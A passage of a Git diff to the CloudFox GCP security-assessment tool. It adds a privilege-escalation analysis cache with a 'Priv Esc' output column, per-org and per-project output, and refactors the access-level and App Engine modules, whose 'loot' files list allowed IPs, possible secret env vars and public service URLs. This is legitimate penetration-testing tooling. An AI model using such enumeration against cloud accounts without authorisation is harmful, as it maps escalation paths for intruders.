"github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -27,6 +31,10 @@ var ( GCPOutputDirectory string GCPVerbosity int GCPWrapTable bool + GCPFlatOutput bool + + // Privesc analysis flag + GCPWithPrivesc bool // misc options // GCPIgnoreCache bool @@ -68,7 +76,8 @@ var ( // Resolve project name for single project resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { - GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + rawProjectIDs := internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + GCPProjectIDs = deduplicateProjectIDs(rawProjectIDs) // Resolve project names for all projects in list resolveProjectNames(GCPProjectIDs) } else { @@ -86,11 +95,74 @@ var ( GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s.\n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials\n\nTry: gcloud auth application-default login", err.Error()), "gcp") } ctx = context.WithValue(ctx, "account", principal.Email) + + // Build scope hierarchy for hierarchical output (unless --flat-output is set) + if !GCPFlatOutput && len(GCPProjectIDs) > 0 { + GCPLogger.InfoM("Building scope hierarchy for hierarchical output...", "gcp") + orgsSvc := orgsservice.New() + provider := orgsservice.NewHierarchyProvider(orgsSvc) + hierarchy, err := gcpinternal.BuildScopeHierarchy(GCPProjectIDs, provider) + if err != nil { + GCPLogger.InfoM(fmt.Sprintf("Could not build hierarchy, using flat output: %v", err), "gcp") + } else { + ctx = context.WithValue(ctx, "hierarchy", hierarchy) + // Log hierarchy summary + if len(hierarchy.Organizations) > 0 { + GCPLogger.InfoM(fmt.Sprintf("Detected %d organization(s), %d project(s)", len(hierarchy.Organizations), len(hierarchy.Projects)), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("Detected %d standalone project(s)", len(hierarchy.StandaloneProjs)), "gcp") + } + } + } + + // If --with-privesc flag is set, run privesc analysis and populate cache + // This allows individual modules to show the Priv Esc column + if GCPWithPrivesc && len(GCPProjectIDs) > 0 { + GCPLogger.InfoM("Running privilege escalation analysis (--with-privesc)...", "gcp") + privescCache := runPrivescAndPopulateCache(ctx) + if privescCache != nil && privescCache.IsPopulated() { + ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) + GCPLogger.SuccessM("Privesc cache populated - modules will show Priv Esc column", "gcp") + } + } + cmd.SetContext(ctx) }, } ) +// deduplicateProjectIDs removes duplicates, trims whitespace, and filters empty entries +func deduplicateProjectIDs(projectIDs []string) []string { + seen := make(map[string]bool) + var result []string + duplicateCount := 0 + + for _, id := range projectIDs { + // Trim whitespace + id = strings.TrimSpace(id) + + // Skip empty lines + if id == "" { + continue + } + + // Skip duplicates + if seen[id] { + duplicateCount++ + continue + } + + seen[id] = true + result = append(result, id) + } + + if duplicateCount > 0 { + GCPLogger.InfoM(fmt.Sprintf("Removed %d duplicate project ID(s) from list", duplicateCount), "gcp") + } + + return result +} + // resolveProjectNames fetches display names for given project IDs func resolveProjectNames(projectIDs []string) { if len(projectIDs) == 0 { @@ -131,20 +203,142 @@ var GCPAllChecksCommand = &cobra.Command{ Short: "Runs all available GCP commands", Long: `Executes all available GCP commands to collect and display information from all supported GCP services.`, Run: func(cmd *cobra.Command, args []string) { + var executedModules []string + startTime := time.Now() + ctx := cmd.Context() + + // Run privesc analysis first and populate cache for other modules + GCPLogger.InfoM("Running privilege escalation analysis first to populate cache...", "all-checks") + privescCache := runPrivescAndPopulateCache(ctx) + if privescCache != nil && privescCache.IsPopulated() { + // Store cache in context for other modules to use + ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) + cmd.SetContext(ctx) + GCPLogger.SuccessM("Privesc cache populated - other modules will show Priv Esc column", "all-checks") + } else { + GCPLogger.InfoM("Privesc analysis not available - Priv Esc column will show '-'", "all-checks") + } + GCPLogger.InfoM("", "all-checks") + + // Count total modules to execute (excluding self, hidden, and privesc which we already ran) + var modulesToRun []*cobra.Command for _, childCmd := range GCPCommands.Commands() { - if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion + if childCmd == cmd { // Skip the run-all command itself continue } if childCmd.Hidden { // Skip hidden commands continue } + if childCmd.Use == "privesc" { // Skip privesc since we already ran it + continue + } + modulesToRun = append(modulesToRun, childCmd) + } + totalModules := len(modulesToRun) + + GCPLogger.InfoM(fmt.Sprintf("Starting execution of %d modules...", totalModules), "all-checks") + GCPLogger.InfoM("", "all-checks") - GCPLogger.InfoM(fmt.Sprintf("Running command: %s", childCmd.Use), "all-checks") + // Add privesc to executed list since we ran it first + executedModules = append(executedModules, "privesc") + + for i, childCmd := range modulesToRun { + GCPLogger.InfoM(fmt.Sprintf("[%d/%d] Running: %s", i+1, totalModules, childCmd.Use), "all-checks") childCmd.Run(cmd, args) + executedModules = append(executedModules, childCmd.Use) } + + // Print summary + duration := time.Since(startTime) + printExecutionSummary(executedModules, duration) }, } +// runPrivescAndPopulateCache runs the privesc analysis and returns a populated cache +func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { + cache := gcpinternal.NewPrivescCache() + + // Get project IDs from context + projectIDs, ok := ctx.Value("projectIDs").([]string) + if !ok || len(projectIDs) == 0 { + return cache + } + + // Get project names from context + projectNames, _ := ctx.Value("projectNames").(map[string]string) + if projectNames == nil { + projectNames = make(map[string]string) + } + + // Run privesc analysis + svc := privescservice.New() + result, err := svc.CombinedPrivescAnalysis(ctx, projectIDs, projectNames) + if err != nil { + GCPLogger.ErrorM(fmt.Sprintf("Failed to run privesc analysis: %v", err), "all-checks") + return cache + } + + // Convert privesc paths to cache format + var pathInfos []gcpinternal.PrivescPathInfo + for _, path := range result.AllPaths { + pathInfos = append(pathInfos, gcpinternal.PrivescPathInfo{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + Method: path.Method, + RiskLevel: path.RiskLevel, + Target: path.TargetResource, + Permissions: path.Permissions, + }) + } + + // Populate cache + cache.PopulateFromPaths(pathInfos) + + GCPLogger.InfoM(fmt.Sprintf("Found %d privilege escalation path(s)", len(result.AllPaths)), "all-checks") + + return cache +} + +// printExecutionSummary prints a summary of all executed modules +func printExecutionSummary(modules []string, duration time.Duration) { + GCPLogger.InfoM("", "all-checks") // blank line + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(" EXECUTION SUMMARY ", "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total modules executed: %d", len(modules)), "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total execution time: %s", formatDuration(duration)), "all-checks") + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM("Modules executed:", "all-checks") + + // Print modules in columns for better readability + const columnsPerRow = 4 + for i := 0; i < len(modules); i += columnsPerRow { + row := " " + for j := i; j < i+columnsPerRow && j < len(modules); j++ { + row += fmt.Sprintf("%-20s", modules[j]) + } + GCPLogger.InfoM(row, "all-checks") + } + + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Output directory: %s", GCPOutputDirectory), "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") +} + +// formatDuration formats a duration in a human-readable way +func formatDuration(d time.Duration) string { + if d < time.Minute { + return fmt.Sprintf("%.1f seconds", d.Seconds()) + } else if d < time.Hour { + minutes := int(d.Minutes()) + seconds := int(d.Seconds()) % 60 + return fmt.Sprintf("%dm %ds", minutes, seconds) + } + hours := int(d.Hours()) + minutes := int(d.Minutes()) % 60 + return fmt.Sprintf("%dh %dm", hours, minutes) +} + func init() { // Globals flags for the GCP commands @@ -163,6 +357,8 @@ func init() { GCPCommands.PersistentFlags().StringVar(&GCPOutputDirectory, "outdir", defaultOutputDir, "Output Directory ") // GCPCommands.PersistentFlags().IntVarP(&Goroutines, "max-goroutines", "g", 30, "Maximum number of concurrent goroutines") GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") + GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") + GCPCommands.PersistentFlags().BoolVar(&GCPWithPrivesc, "with-privesc", false, "Run privilege escalation analysis and add Priv Esc column to output (runs privesc first)") // Available commands GCPCommands.AddCommand( diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go index 01e1bd91..5c51393d 100644 --- a/gcp/commands/accesslevels.go +++ b/gcp/commands/accesslevels.go @@ -4,6 +4,7 @@ import ( "context" "fmt" "strings" + "sync" accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" "github.com/BishopFox/cloudfox/globals" @@ -39,9 +40,10 @@ func init() { type AccessLevelsModule struct { gcpinternal.BaseGCPModule - OrgID string - AccessLevels []accesspolicyservice.AccessLevelInfo - LootMap map[string]*internal.LootFile + OrgID string + OrgAccessLevels map[string][]accesspolicyservice.AccessLevelInfo // orgID -> access levels + LootMap map[string]map[string]*internal.LootFile // orgID -> loot files + mu sync.Mutex } type AccessLevelsOutput struct { @@ -73,17 +75,26 @@ func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) } - // Run for each organization + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgAccessLevels: make(map[string][]accesspolicyservice.AccessLevelInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Process each organization for _, orgID := range orgIDs { - module := &AccessLevelsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - OrgID: orgID, - AccessLevels: []accesspolicyservice.AccessLevelInfo{}, - LootMap: make(map[string]*internal.LootFile), - } - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) + module.processOrg(cmdCtx.Ctx, orgID, cmdCtx.Logger) } + + // Write combined output + allLevels := module.getAllAccessLevels() + if len(allLevels) == 0 { + cmdCtx.Logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + cmdCtx.Logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(allLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + module.writeOutput(cmdCtx.Ctx, cmdCtx.Logger) } // discoverOrganizations finds organization IDs from project ancestry @@ -114,64 +125,86 @@ func discoverOrganizations(ctx context.Context, projectIDs []string, logger inte return orgs } -func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", m.OrgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) +func (m *AccessLevelsModule) getAllAccessLevels() []accesspolicyservice.AccessLevelInfo { + var all []accesspolicyservice.AccessLevelInfo + for _, levels := range m.OrgAccessLevels { + all = append(all, levels...) + } + return all +} - svc := accesspolicyservice.New() +func (m *AccessLevelsModule) processOrg(ctx context.Context, orgID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", orgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } - levels, err := svc.ListAccessLevels(m.OrgID) - if err != nil { - // Use shared error handling - gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, - fmt.Sprintf("Could not list access levels for org %s", m.OrgID)) - return + m.mu.Lock() + // Initialize loot for this org + if m.LootMap[orgID] == nil { + m.LootMap[orgID] = make(map[string]*internal.LootFile) + m.LootMap[orgID]["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", + } + m.LootMap[orgID]["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", + Contents: "", + } } + m.mu.Unlock() - m.AccessLevels = levels + svc := accesspolicyservice.New() - if len(m.AccessLevels) == 0 { - logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + levels, err := svc.ListAccessLevels(orgID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", orgID)) return } - for _, level := range m.AccessLevels { - m.addToLoot(level) + m.mu.Lock() + m.OrgAccessLevels[orgID] = levels + for _, level := range levels { + m.addToLoot(orgID, level) } - - logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(m.AccessLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) - m.writeOutput(ctx, logger) + m.mu.Unlock() } -func (m *AccessLevelsModule) initializeLootFiles() { - m.LootMap["access-levels-details"] = &internal.LootFile{ - Name: "access-levels-details", - Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", - } - m.LootMap["access-levels-allowed-ips"] = &internal.LootFile{ - Name: "access-levels-allowed-ips", - Contents: "", +func (m *AccessLevelsModule) addToLoot(orgID string, level accesspolicyservice.AccessLevelInfo) { + if lootFile := m.LootMap[orgID]["access-levels-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) } -} - -func (m *AccessLevelsModule) addToLoot(level accesspolicyservice.AccessLevelInfo) { - m.LootMap["access-levels-details"].Contents += fmt.Sprintf( - "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", - level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) for _, condition := range level.Conditions { for _, ip := range condition.IPSubnetworks { - m.LootMap["access-levels-allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + if lootFile := m.LootMap[orgID]["access-levels-allowed-ips"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } } } } func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *AccessLevelsModule) getLevelsHeader() []string { + return []string{"Org ID", "Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} +} + +func (m *AccessLevelsModule) getConditionsHeader() []string { + return []string{"Org ID", "Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"} +} - // Access Levels table - header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} +func (m *AccessLevelsModule) levelsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { var body [][]string - for _, level := range m.AccessLevels { + for _, level := range levels { hasDevicePolicy := "No" for _, cond := range level.Conditions { if cond.DevicePolicy != nil { @@ -186,6 +219,7 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo } body = append(body, []string{ + orgID, level.Name, level.Title, level.PolicyName, @@ -194,15 +228,12 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo hasDevicePolicy, }) } - tables = append(tables, internal.TableFile{ - Name: "access-levels", - Header: header, - Body: body, - }) - - // Conditions detail table - var condBody [][]string - for _, level := range m.AccessLevels { + return body +} + +func (m *AccessLevelsModule) conditionsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { + var body [][]string + for _, level := range levels { for i, cond := range level.Conditions { ipRanges := strings.Join(cond.IPSubnetworks, ", ") if ipRanges == "" { @@ -236,7 +267,8 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo } } - condBody = append(condBody, []string{ + body = append(body, []string{ + orgID, level.Name, fmt.Sprintf("%d", i+1), ipRanges, @@ -246,26 +278,107 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo }) } } + return body +} + +func (m *AccessLevelsModule) buildTablesForOrg(orgID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if levels, ok := m.OrgAccessLevels[orgID]; ok && len(levels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: m.levelsToTableBody(levels, orgID), + }) + + condBody := m.conditionsToTableBody(levels, orgID) + if len(condBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-level-conditions", + Header: m.getConditionsHeader(), + Body: condBody, + }) + } + } + + return tableFiles +} + +func (m *AccessLevelsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } - if len(condBody) > 0 { + for orgID := range m.OrgAccessLevels { + tableFiles := m.buildTablesForOrg(orgID) + + var lootFiles []internal.LootFile + if orgLoot, ok := m.LootMap[orgID]; ok { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.OrgLevelData[orgID] = AccessLevelsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} + +func (m *AccessLevelsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Collect all org IDs + var orgIDs []string + for orgID := range m.OrgAccessLevels { + orgIDs = append(orgIDs, orgID) + } + + // Build combined tables with org ID in each row + var allLevelRows [][]string + var allCondRows [][]string + for orgID, levels := range m.OrgAccessLevels { + allLevelRows = append(allLevelRows, m.levelsToTableBody(levels, orgID)...) + allCondRows = append(allCondRows, m.conditionsToTableBody(levels, orgID)...) + } + + if len(allLevelRows) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: allLevelRows, + }) + } + + if len(allCondRows) > 0 { tables = append(tables, internal.TableFile{ Name: "access-level-conditions", - Header: []string{"Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"}, - Body: condBody, + Header: m.getConditionsHeader(), + Body: allCondRows, }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, orgLoot := range m.LootMap { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } output := AccessLevelsOutput{Table: tables, Loot: lootFiles} err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + "org", orgIDs, orgIDs, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) } diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 959b040f..320e168e 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -98,12 +98,14 @@ type AppEngineFirewallRule struct { type AppEngineModule struct { gcpinternal.BaseGCPModule - Apps []AppEngineApp - Services []AppEngineService - Versions []AppEngineVersion - FirewallRules []AppEngineFirewallRule - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Per-project data for hierarchical output + ProjectApps map[string][]AppEngineApp + ProjectServices map[string][]AppEngineService + ProjectVersions map[string][]AppEngineVersion + ProjectFirewallRules map[string][]AppEngineFirewallRule + LootMap map[string]map[string]*internal.LootFile + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex totalApps int totalServices int @@ -132,15 +134,14 @@ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { } module := &AppEngineModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Apps: []AppEngineApp{}, - Services: []AppEngineService{}, - Versions: []AppEngineVersion{}, - FirewallRules: []AppEngineFirewallRule{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectApps: make(map[string][]AppEngineApp), + ProjectServices: make(map[string][]AppEngineService), + ProjectVersions: make(map[string][]AppEngineVersion), + ProjectFirewallRules: make(map[string][]AppEngineFirewallRule), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -148,6 +149,9 @@ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) aeService, err := appengine.NewService(ctx) @@ -172,7 +176,7 @@ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", - m.totalApps, m.totalServices, len(m.Versions)), GCP_APPENGINE_MODULE_NAME) + m.totalApps, m.totalServices, len(m.getAllVersions())), GCP_APPENGINE_MODULE_NAME) if m.publicCount > 0 { logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) @@ -205,6 +209,16 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, m.mu.Lock() m.totalApps++ + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# Generated by CloudFox\n\n", + } + } m.mu.Unlock() appRecord := AppEngineApp{ @@ -223,7 +237,7 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, } m.mu.Lock() - m.Apps = append(m.Apps, appRecord) + m.ProjectApps[projectID] = append(m.ProjectApps[projectID], appRecord) m.mu.Unlock() m.enumerateServices(ctx, projectID, aeService, logger) @@ -255,7 +269,7 @@ func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID strin } m.mu.Lock() - m.Services = append(m.Services, serviceRecord) + m.ProjectServices[projectID] = append(m.ProjectServices[projectID], serviceRecord) m.mu.Unlock() ingressSettings := "all" @@ -336,7 +350,7 @@ func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serv } m.mu.Lock() - m.Versions = append(m.Versions, versionRecord) + m.ProjectVersions[projectID] = append(m.ProjectVersions[projectID], versionRecord) m.mu.Unlock() } } @@ -360,14 +374,14 @@ func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID } m.mu.Lock() - m.FirewallRules = append(m.FirewallRules, fwRule) + m.ProjectFirewallRules[projectID] = append(m.ProjectFirewallRules[projectID], fwRule) m.mu.Unlock() } m.mu.Lock() - for i := range m.Apps { - if m.Apps[i].ProjectID == projectID { - m.Apps[i].FirewallRules = len(rules.IngressRules) + for i := range m.ProjectApps[projectID] { + if m.ProjectApps[projectID][i].ProjectID == projectID { + m.ProjectApps[projectID][i].FirewallRules = len(rules.IngressRules) break } } @@ -391,13 +405,15 @@ func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, v m.mu.Lock() m.secretsFound++ - m.LootMap["appengine-commands"].Contents += fmt.Sprintf( - "# Potential secret in env var: %s (service: %s, version: %s)\n"+ - "# Recommendation: Migrate to Secret Manager\n"+ - "gcloud app versions describe %s --service=%s --project=%s\n\n", - name, serviceID, versionID, - versionID, serviceID, projectID, - ) + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, + ) + } m.mu.Unlock() break } @@ -422,24 +438,47 @@ func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { } // ------------------------------ -// Loot File Management +// Output Generation // ------------------------------ -func (m *AppEngineModule) initializeLootFiles() { - m.LootMap["appengine-commands"] = &internal.LootFile{ - Name: "appengine-commands", - Contents: "# App Engine Commands\n" + - "# Generated by CloudFox\n\n", +func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) } } -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile +// getAllVersions returns all versions from all projects +func (m *AppEngineModule) getAllVersions() []AppEngineVersion { + var all []AppEngineVersion + for _, versions := range m.ProjectVersions { + all = append(all, versions...) + } + return all +} + +// getAllApps returns all apps from all projects +func (m *AppEngineModule) getAllApps() []AppEngineApp { + var all []AppEngineApp + for _, apps := range m.ProjectApps { + all = append(all, apps...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *AppEngineModule) getAllFirewallRules() []AppEngineFirewallRule { + var all []AppEngineFirewallRule + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) + } + return all +} - // Unified table with all columns - header := []string{ +// getTableHeader returns the main appengine table header +func (m *AppEngineModule) getTableHeader() []string { + return []string{ "Project ID", "Project Name", "App ID", @@ -453,6 +492,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge "Ingress", "Public", "Service Account", + "Priv Esc", "Default SA", "Deprecated", "Env Vars", @@ -460,15 +500,18 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge "VPC Connector", "URL", } +} +// buildTablesForProject builds tables for given project data +func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngineApp, versions []AppEngineVersion, firewallRules []AppEngineFirewallRule) []internal.TableFile { + var tables []internal.TableFile + header := m.getTableHeader() var body [][]string - if len(m.Versions) > 0 { - // We have versions - show full details for each version - for _, ver := range m.Versions { - // Find the corresponding app for this version + if len(versions) > 0 { + for _, ver := range versions { var app AppEngineApp - for _, a := range m.Apps { + for _, a := range apps { if a.ProjectID == ver.ProjectID { app = a break @@ -490,6 +533,16 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge deprecatedStr = "Yes" } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if ver.ServiceAccount != "" { + privEsc = m.PrivescCache.GetPrivescSummary(ver.ServiceAccount) + } else { + privEsc = "No" + } + } + body = append(body, []string{ ver.ProjectID, m.GetProjectName(ver.ProjectID), @@ -504,6 +557,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge ver.IngressSettings, publicStr, ver.ServiceAccount, + privEsc, defaultSAStr, deprecatedStr, fmt.Sprintf("%d", ver.EnvVarCount), @@ -512,18 +566,19 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge ver.URL, }) - // Add to loot - if ver.Public { - m.LootMap["appengine-commands"].Contents += fmt.Sprintf( - "# Public App Engine service: %s/%s\n"+ - "curl %s\n\n", - ver.ServiceID, ver.ID, ver.URL, - ) + // Add public services to loot + if ver.Public && m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } } } } else { - // No versions - show app info with "No services deployed" for version columns - for _, app := range m.Apps { + for _, app := range apps { body = append(body, []string{ app.ProjectID, m.GetProjectName(app.ProjectID), @@ -532,18 +587,10 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge app.ServingStatus, app.DefaultHostname, "No services deployed", - "", - "", - "", - "", - "", + "", "", "", "", "", app.ServiceAccount, - "", - "", - "", - "", - "", - "", + "-", // Priv Esc + "", "", "", "", "", "", }) } } @@ -555,9 +602,9 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge }) // Firewall rules table - if len(m.FirewallRules) > 0 { + if len(firewallRules) > 0 { var fwBody [][]string - for _, rule := range m.FirewallRules { + for _, rule := range firewallRules { fwBody = append(fwBody, []string{ rule.ProjectID, m.GetProjectName(rule.ProjectID), @@ -582,11 +629,74 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge }) } - // Collect loot files + return tables +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *AppEngineModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectApps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + apps := m.ProjectApps[projectID] + versions := m.ProjectVersions[projectID] + firewallRules := m.ProjectFirewallRules[projectID] + + tables := m.buildTablesForProject(projectID, apps, versions, firewallRules) + + // Collect loot for this project + var lootFiles []internal.LootFile 